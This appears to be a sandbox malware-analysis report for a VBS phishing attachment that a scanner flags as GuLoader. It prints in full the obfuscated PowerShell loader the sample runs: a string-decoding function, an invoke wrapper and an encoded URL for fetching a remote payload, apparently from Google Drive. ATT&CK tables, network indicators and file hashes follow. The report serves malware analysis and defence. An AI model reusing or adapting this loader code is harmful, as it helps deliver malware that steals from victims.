hCi.dat ventDiblap vandsDepla: Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki ';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin ';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous (Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+ S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESuspeNTadestDomm,E kor rklammNData eHofna ');Semicalcareous (Osmate11 'gudma$ MulkGekstrLTrigooDuernbRasteAPseudLBetnk:ApostfBalstLBlandyTroj vMejeseD ivarL njeSTimonJSteenUDevi sErosisDiscuePeakbrDesp =Lib l$SammefEksamo .ennRHorrodFor erCyclovRadi,eFodbanA scidPredeEUlnne.SjklhSKallipHo lelBygrnI Ealdt kara(Nonab$ UnresU derOSpul,r TyvstTi,deSLaureM,onvouGemy.sHulebkMinveeT adit Mere)Alleg ');Semicalcareous (Osmate11 'Pleu,[Jor,fNTipssE Sk ltBrutt.CoiffS CancE E ecRHalvpVBidariF lmacbrutie uercpOvertOStinki nedln F rlTMegacMNe bjAS cioNKartoAForJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#licence skafotternes brdlses brnetestamente #>;$cabrera='glassenes';<#jotting slubbering overfortolkningers farvefjernsynene #>;$bevaringsforanstaltning=$uudgrundelig+$host.ui; function osmate11($samlets80){if ($bevaringsforanstaltning) {$unsavoredness++;}$forblst=$baktericide+$samlets80.'length'-$unsavoredness; for( $udstykningsomraadets=5;$udstykningsomraadets -lt $forblst;$udstykningsomraadets+=6){$skomagerdrengenes=$udstykningsomraadets;$daschagga+=$samlets80[$udstykningsomraadets];$maurers='dictyoceratine';}$daschagga;}function semicalcareous($passionlessness){ . ($duplicidentata) ($passionlessness);}$fremstillingsevnen=osmate11 'hakkemudsprostortz galliunclel un elbenenavrigh/vasom ';$fremstillingsevnen+=osmate11 'rhi o5anlgs. habi0sblad lyrik( eetw,ndesif ldlnnoterdopsejojehovwm,ness d bg cyrton provtunwra t oto1sphen0exter.lymph0hvine; unaf aandewbor.eifor un edbu6fllet4 esul;nonsy adipox viln6f rma4freja;relie intera trivikld.: ribe1bffel3t.ran1kobra.l.mai0 mar )ulvef di opg.ncanehoeincunderks,idso step/bjerg2huma 0 ilox1forsi0anhng0un,am1 gab.0afdel1fikt anticfs.aabimadolrsysteetaihofamb yotrestx unap/nomar1t ppe3minis1kamos.me,er0rean ';$lingvisternes=osmate11 'dukseu .oncsa.oeteudlevrforli-go daa linjgpr vlesepa.nmotorttegng ';$fordrvende=osmate11 'vask hci.dat ventdiblap vandsdepla: pres/ hets/foreodsaprorma itino mavbyggeem ste.slatighusgeosibneo reklg satslnonfue strm.c.fffcbrouioch,vamersta/pe.iouhidroc uffi?faulte paraxaxonopgerero a.rarf rsktannas=reg edseedioviolawprogrn,turklsti lo bulmatilkbdlacor&vap.rianoind gash=tymba1gangltdeleseknudrjoldfrplovtel resntpantinjongltepaulbopal j sh,ee,ftericompoumassererhven verszpo.no9geratmbrnde2afbetaannebuforl p borgcthurisnazir0 te.elblemowindtjzfootbqswimm0c rond mystyenter ';$sortsmusket=osmate11 ',carp>ligki ';$duplicidentata=osmate11 ' leveifattieva thxkabin ';$nasalises='filamenterne';$friktionskoefficienterne='\benzinforhandlers.xan';semicalcareous (osmate11 ' t.pe$slutngtrkullbest,o gradbkra faunhealcentr:dis,uf unhorbelfasoutnut une.egla ih ivena re tainhibnhoarsddiskesj urnvsangei,yssedrhamneafskrneffem9orium3circu=a.sac$fdseleoutwon ebrv eten:c.ffea ubtrpradiopbredbd glyca isoct ,lodaang.e+ s,bs$patenfchemormiscoijeeptkarbejtdis,rinonseosynkrnovermssgnomktrmano subve,ibrofvedhnfreco ilinkbcbran.iindehesuspentadestdomm,e kor rklammndata ehofna ');semicalcareous (osmate11 'gudma$ mulkgekstrltrigooduernbrasteapseudlbetnk:apostfbalstlblandytroj vmejesed ivarl njestimonjsteenudevi serosisdiscuepeakbrdesp =lib l$sammefeksamo .ennrhorrodfor ercyclovradi,efodbana scidpredeeulnne.sjklhskallipho lelbygrni ealdt kara(nonab$ unresu derospul,r tyvstti,deslaurem,onvougemy.shulebkminveet adit mere)alleg ');semicalcareous (osmate11 'pleu,[jor,fntipsse sk ltbrutt.coiffs cance e ecrhalvpvbidarif lmacbrutie uercpovertostinki nedln f rltmegacmne bjas cionkartoafor
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#licence skafotternes brdlses brnetestamente #>;$cabrera='glassenes';<#jotting slubbering overfortolkningers farvefjernsynene #>;$bevaringsforanstaltning=$uudgrundelig+$host.ui; function osmate11($samlets80){if ($bevaringsforanstaltning) {$unsavoredness++;}$forblst=$baktericide+$samlets80.'length'-$unsavoredness; for( $udstykningsomraadets=5;$udstykningsomraadets -lt $forblst;$udstykningsomraadets+=6){$skomagerdrengenes=$udstykningsomraadets;$daschagga+=$samlets80[$udstykningsomraadets];$maurers='dictyoceratine';}$daschagga;}function semicalcareous($passionlessness){ . ($duplicidentata) ($passionlessness);}$fremstillingsevnen=osmate11 'hakkemudsprostortz galliunclel un elbenenavrigh/vasom ';$fremstillingsevnen+=osmate11 'rhi o5anlgs. habi0sblad lyrik( eetw,ndesif ldlnnoterdopsejojehovwm,ness d bg cyrton provtunwra t oto1sphen0exter.lymph0hvine; unaf aandewbor.eifor un edbu6fllet4 esul;nonsy adipox viln6f rma4freja;relie intera trivikld.: ribe1bffel3t.ran1kobra.l.mai0 mar )ulvef di opg.ncanehoeincunderks,idso step/bjerg2huma 0 ilox1forsi0anhng0un,am1 gab.0afdel1fikt anticfs.aabimadolrsysteetaihofamb yotrestx unap/nomar1t ppe3minis1kamos.me,er0rean ';$lingvisternes=osmate11 'dukseu .oncsa.oeteudlevrforli-go daa linjgpr vlesepa.nmotorttegng ';$fordrvende=osmate11 'vask hci.dat ventdiblap vandsdepla: pres/ hets/foreodsaprorma itino mavbyggeem ste.slatighusgeosibneo reklg satslnonfue strm.c.fffcbrouioch,vamersta/pe.iouhidroc uffi?faulte paraxaxonopgerero a.rarf rsktannas=reg edseedioviolawprogrn,turklsti lo bulmatilkbdlacor&vap.rianoind gash=tymba1gangltdeleseknudrjoldfrplovtel resntpantinjongltepaulbopal j sh,ee,ftericompoumassererhven verszpo.no9geratmbrnde2afbetaannebuforl p borgcthurisnazir0 te.elblemowindtjzfootbqswimm0c rond mystyenter ';$sortsmusket=osmate11 ',carp>ligki ';$duplicidentata=osmate11 ' leveifattieva thxkabin ';$nasalises='filamenterne';$friktionskoefficienterne='\benzinforhandlers.xan';semicalcareous (osmate11 ' t.pe$slutngtrkullbest,o gradbkra faunhealcentr:dis,uf unhorbelfasoutnut une.egla ih ivena re tainhibnhoarsddiskesj urnvsangei,yssedrhamneafskrneffem9orium3circu=a.sac$fdseleoutwon ebrv eten:c.ffea ubtrpradiopbredbd glyca isoct ,lodaang.e+ s,bs$patenfchemormiscoijeeptkarbejtdis,rinonseosynkrnovermssgnomktrmano subve,ibrofvedhnfreco ilinkbcbran.iindehesuspentadestdomm,e kor rklammndata ehofna ');semicalcareous (osmate11 'gudma$ mulkgekstrltrigooduernbrasteapseudlbetnk:apostfbalstlblandytroj vmejesed ivarl njestimonjsteenudevi serosisdiscuepeakbrdesp =lib l$sammefeksamo .ennrhorrodfor ercyclovradi,efodbana scidpredeeulnne.sjklhskallipho lelbygrni ealdt kara(nonab$ unresu derospul,r tyvstti,deslaurem,onvougemy.shulebkminveet adit mere)alleg ');semicalcareous (osmate11 'pleu,[jor,fntipsse sk ltbrutt.coiffs cance e ecrhalvpvbidarif lmacbrutie uercpovertostinki nedln f rltmegacmne bjas cionkartoaforJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information221
      Scripting
      Valid Accounts2
      Command and Scripting Interpreter
      221
      Scripting
      11
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      Security Software Discovery
      Remote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      Exploitation for Client Execution
      1
      DLL Side-Loading
      1
      DLL Side-Loading
      21
      Virtualization/Sandbox Evasion
      LSASS Memory1
      Process Discovery
      Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell
      Logon Script (Windows)Logon Script (Windows)11
      Process Injection
      Security Account Manager21
      Virtualization/Sandbox Evasion
      SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Obfuscated Files or Information
      NTDS1
      Application Window Discovery
      Distributed Component Object ModelInput Capture13
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Software Packing
      LSA Secrets1
      File and Directory Discovery
      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain Credentials12
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs32%ReversingLabsScript-WScript.Trojan.GuLoader
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://nuget.org/NuGet.exe0%URL Reputationsafe
      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
      https://go.micro0%URL Reputationsafe
      https://contoso.com/0%URL Reputationsafe
      https://nuget.org/nuget.exe0%URL Reputationsafe
      https://contoso.com/License0%URL Reputationsafe
      https://contoso.com/Icon0%URL Reputationsafe
      https://aka.ms/pscore680%URL Reputationsafe
      https://apis.google.com0%URL Reputationsafe
      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      142.250.185.206
      truefalse
        unknown
        drive.usercontent.google.com
        142.250.185.65
        truefalse
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          https://www.google.compowershell.exe, 00000002.00000002.1646952712.000001E99A1C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmpfalse
            unknown
            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1675040030.000001E9A9D9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1675040030.000001E9A9EE1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://drive.usercontent.google.compowershell.exe, 00000002.00000002.1646952712.000001E99BAE8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BF1C000.00000004.00000800.00020000.00000000.sdmpfalse
              unknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1646952712.000001E999F57000.00000004.00000800.00020000.00000000.sdmptrue
              • URL Reputation: safe
              unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1646952712.000001E999F57000.00000004.00000800.00020000.00000000.sdmptrue
                unknown
                https://go.micropowershell.exe, 00000002.00000002.1646952712.000001E99B05F000.00000004.00000800.00020000.00000000.sdmptrue
                • URL Reputation: safe
                unknown
                https://drive.googPzmpowershell.exe, 00000002.00000002.1646952712.000001E99BBD6000.00000004.00000800.00020000.00000000.sdmpfalse
                  unknown
                  https://drive.usercontent.googhkopowershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmpfalse
                    unknown
                    https://contoso.com/powershell.exe, 00000002.00000002.1675040030.000001E9A9EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    https://drive.usercontent.google.comD=620powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmpfalse
                      unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1675040030.000001E9A9D9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1675040030.000001E9A9EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/Licensepowershell.exe, 00000002.00000002.1675040030.000001E9A9EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/Iconpowershell.exe, 00000002.00000002.1675040030.000001E9A9EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://drive.google.compowershell.exe, 00000002.00000002.1646952712.000001E99BBD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1DD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E999F57000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99B9FD000.00000004.00000800.00020000.00000000.sdmpfalse
                        unknown
                        https://drive.usercontent.google.compowershell.exe, 00000002.00000002.1646952712.000001E99BF1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmpfalse
                          unknown
                          https://drive.googPbpowershell.exe, 00000002.00000002.1646952712.000001E99BAAA000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            http://drive.google.compowershell.exe, 00000002.00000002.1646952712.000001E99BBD6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAAF000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              https://aka.ms/pscore68powershell.exe, 00000002.00000002.1646952712.000001E999D31000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://apis.google.compowershell.exe, 00000002.00000002.1646952712.000001E99A1C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAAF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99A1AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1646952712.000001E99BAD4000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1646952712.000001E999D31000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1646952712.000001E999F57000.00000004.00000800.00020000.00000000.sdmptrue
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                142.250.185.206
                                drive.google.comUnited States
                                15169GOOGLEUSfalse
                                142.250.185.65
                                drive.usercontent.google.comUnited States
                                15169GOOGLEUSfalse
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1540405
                                Start date and time:2024-10-23 18:42:05 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 21s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:7
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs
                                renamed because original name is a hash value
                                Original Sample Name:BOLUDA CORPORACIN MARTIMA, S.L. PEDIDO 268e44.vbs
                                Detection:MAL
                                Classification:mal100.expl.evad.winVBS@4/5@2/2
                                EGA Information:Failed
                                HCA Information:
                                • Successful, ratio: 100%
                                • Number of executed functions: 8
                                • Number of non-executed functions: 0
                                Cookbook Comments:
                                • Found application associated with file extension: .vbs
                                • Stop behavior analysis, all processes terminated
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                • Execution Graph export aborted for target powershell.exe, PID 432 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs
                                TimeTypeDescription
                                12:43:10API Interceptor49x Sleep call for process: powershell.exe modified
                                No context
                                No context
                                No context
                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                3b5074b1b5d032e5620f69f9f700ff0ehttps://www.jasper.ai/Get hashmaliciousUnknownBrowse
                                • 142.250.185.206
                                • 142.250.185.65
                                AL DALEEL ELECT SWITCH GEAR TR LLC. - PO.exeGet hashmaliciousMassLogger RATBrowse
                                • 142.250.185.206
                                • 142.250.185.65
                                ZW_PCCE-010023024001.batGet hashmaliciousRemcos, GuLoaderBrowse
                                • 142.250.185.206
                                • 142.250.185.65
                                Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                • 142.250.185.206
                                • 142.250.185.65
                                Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                • 142.250.185.206
                                • 142.250.185.65
                                69-33-600 Kreiselkammer ER3.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                • 142.250.185.206
                                • 142.250.185.65
                                PO 202410-224.vbsGet hashmaliciousUnknownBrowse
                                • 142.250.185.206
                                • 142.250.185.65
                                https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NkQhxQlLbRIjo8QpKjRS5qi3QTD4TCmZYuyRNm1nr4w0PSyGwzmG3z_7xprlPWVcJHmI_fpJbjmguOnLn78cm0vTw-4fw8_dttdENzIEmoji9oYsWsAtST2VKmiVOSoJqdyVNYa9pUnKUIDOWiZA0hTgDZrUNoXnphIopaly3TORwyH9YC9Qxdp3XMSYXpJIxKjPXCTxpnFodmlNEyZusugzaDFYfiDUDxm0L7pZ9CeIVNtih33mdpIlF4hGzaGIM8ta2mV83UNlbFYlJCbQhsoM9WKPqbgA2EKsb_VACXX1jKtlM9hpQHcqiKvVsZXuvB16WTBIo6v2IflN7T_8Ly_7-p6G_bz4wbM8n1Sp6MYG7ePPU-Zzu186Pg0H4abuhj5HKZfrF4mPLvT5vndMpR0h183E0MpUvOW7q9xlXB85X820-3i3IC4xLGbBiS-Pf3v-o2eUuge_l-21bG_2vt-fvz8MwAA__9XraZ6Get hashmaliciousUnknownBrowse
                                • 142.250.185.206
                                • 142.250.185.65
                                http://docusign.netGet hashmaliciousUnknownBrowse
                                • 142.250.185.206
                                • 142.250.185.65
                                https://c4hbh789.caspio.com/dp/32a4e0002a1934bee62047dd94d1Get hashmaliciousUnknownBrowse
                                • 142.250.185.206
                                • 142.250.185.65
                                No context
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):11608
                                Entropy (8bit):4.890472898059848
                                Encrypted:false
                                SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):1.1940658735648508
                                Encrypted:false
                                SSDEEP:3:NlllulxmH/lZ:NllUg
                                MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                                SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                                SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                                SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                                Malicious:false
                                Reputation:moderate, very likely benign file
                                Preview:@...e................................. ..............@..........
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:HTML document, ASCII text, with very long lines (1692), with no line terminators
                                Category:dropped
                                Size (bytes):1692
                                Entropy (8bit):5.112760527608317
                                Encrypted:false
